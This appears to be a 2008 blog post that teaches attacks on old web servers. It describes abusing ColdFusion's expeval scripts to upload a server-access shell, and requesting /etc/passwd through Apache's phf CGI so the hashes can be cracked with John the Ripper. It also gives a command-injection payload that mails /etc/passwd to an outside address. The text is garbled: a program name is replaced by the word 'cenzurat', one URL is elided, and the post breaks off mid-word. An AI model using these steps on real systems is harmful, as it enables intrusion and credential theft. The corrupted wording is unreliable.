Cold Fusion has its own scripting language for CGI. These scripts are .cfm files. The /cfdocs/expeval/openfile.cfm file allows you to upload any file to the server. The problem is, the /cfdocs/expeval/exprcalc.cfm file (the script used to view the file you uploaded) deletes the file after you view it. Openfile.cfm exists to help you debug a cfm file of your own. The vulnerability: exprcalc.cfm can be manipulated to delete itself – which will keep it from deleting files you upload. L0pht’s website and SecurityFocus have a cfm script you can upload (called mole.cfm) that gives you full access to the server.

Apache PHF and cenzurat Vulnerabilities
These are two very old vulnerabilities, but still exist on some servers, and are worth mentioning. Apache (a popular Linux webserver) stores its CGI scripts in /cgi-bin/ (which is common). If /cgi-bin/phf exists, you can enter the following URL:
http://www.abouttobehacked.com/cgi-bin/ … etc/passwd
And you will have the /etc/passwd file cat-ed (displayed) in your browser. Crack it with John the Ripper and you’re in. If /cgi-bin/cenzurat exists, you can use the text box on this page to cenzurat the box. If you enter ‘root’ in the box, a shell will execute ‘cenzurat root’ on the UNIX box. So if you type ‘root ; /bin/mail E-mail < /etc/passwd’ the shell will execute ‘cenzurat root ; mail E-mail < /etc/passwd’. A semico

~ by empa7hy on July 14, 2008.
